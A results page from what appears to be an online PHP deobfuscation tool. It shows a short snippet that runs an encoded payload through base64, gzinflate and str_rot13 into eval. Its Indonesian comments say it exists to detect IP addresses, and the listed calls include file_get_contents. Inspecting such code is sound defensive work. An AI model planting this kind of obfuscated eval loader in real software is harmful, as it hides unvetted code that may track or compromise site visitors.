Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Jangan dihapus biar kedetek IPnya */ $explode = 'RqnKK6tZQkWwSENCK1dCV81YLFUqYy..
Decoded Output download
<?php
/* Jangan dihapus biar kedetek IPnya */
$explode = 'RqnKK6tZQkWwSENCK1dCV81YLFUqYyhaVweJ6xUkSKlb82WpFIFr8XZybEBoxXKVUvElUunxBVaJ6VKJ6XYa6m36YwVtyaXJ6prWAA==';
eval(str_rot13(gzinflate(str_rot13(base64_decode($explode)))));
/* Jangan dihapus biar gak error */
?>
Did this file decode correctly?
Original Code
<?php
/* Jangan dihapus biar kedetek IPnya */
$explode = 'RqnKK6tZQkWwSENCK1dCV81YLFUqYyhaVweJ6xUkSKlb82WpFIFr8XZybEBoxXKVUvElUunxBVaJ6VKJ6XYa6m36YwVtyaXJ6prWAA==';
eval(str_rot13(gzinflate(str_rot13(base64_decode($explode)))));
/* Jangan dihapus biar gak error */
?>
Function Calls
gzinflate | 1 |
str_rot13 | 2 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | 1118cea1affb269bd0ebeb812ca0123c |
Eval Count | 1 |
Decode Time | 160 ms |